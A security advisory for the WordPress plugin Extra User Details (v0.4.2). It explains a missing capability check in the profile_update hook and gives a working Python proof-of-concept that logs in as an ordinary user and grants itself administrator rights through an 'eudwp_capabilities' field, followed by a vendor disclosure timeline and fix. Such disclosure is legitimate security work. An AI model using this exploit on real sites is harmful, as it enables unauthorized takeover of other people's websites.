Extra User Details [Privilege Escalation]
Extra User Details plugin for WordPress suffers from a Privilege Escalation vulnerability
Description
Extra User Details plugin for WordPress suffers from a Privilege Escalation vulnerability.
The plugin hooks the eud_update_ExtraFields function to profile_update WordPress action. This function doesn’t properly check user capabilities and updates all meta information passed to post data. The only condition is that the post variable name has the eud prefix which is striped before updating the values in DB.
An attacker can exploit this misbehavior to update the {prefix}_capabilities meta information to gain administrative privileges.
PoC
In the following PoC we assume that the database has the wp prefix, a very common scenario as this is the default WordPress value
#!/usr/bin/python3
################################################################################
# Extra User Details Privilege Escalation Exploit
#
# Author: Pan Vag <[email protected]>
#
# Dependencies: BeautifulSoup (http://www.crummy.com/software/BeautifulSoup/)
################################################################################
import requests
from bs4 import BeautifulSoup
baseUrl = 'http://example.com'
loginUrl = baseUrl + '/wp-login.php'
profileUrl = baseUrl + '/wp-admin/profile.php'
loginPostData = {
'log': 'username',
'pwd': 'password',
'rememberme': 'forever',
'wp-submit': 'Log+In'
}
s = requests.Session()
r = s.post(loginUrl, loginPostData)
if r.status_code != 200:
print('Login error')
exit(1)
r = s.get(profileUrl)
soup = BeautifulSoup(r.text, 'html.parser')
f = soup.find('form', {'id': 'your-profile'})
if not f:
print('Error')
exit(1)
data = {
'eudwp_capabilities[administrator]': 1,
}
for i in f.find_all('input'):
if 'name' in i.attrs and 'value' in i.attrs and i.attrs['value']:
data[i.attrs['name']] = i.attrs['value']
r = s.post(profileUrl, data)
if r.status_code == 200:
print('Success')
exit(0)
Solution
Upgrade to v0.4.2.1
- 13 February 2016
- Pan Vag
- vadimk.com
- wordpress.org
- 0.4.2
- WordPress 4.4.2
- 2016-02-13:
Vendor notified through wordpress.org support forums - 2016-02-13:
Vendor notified through through the contact form in his website - 2016-02-13:
Vendor responded and received details about this issue - 2016-02-15:
Vendor released v0.4.2.1which resolves this issue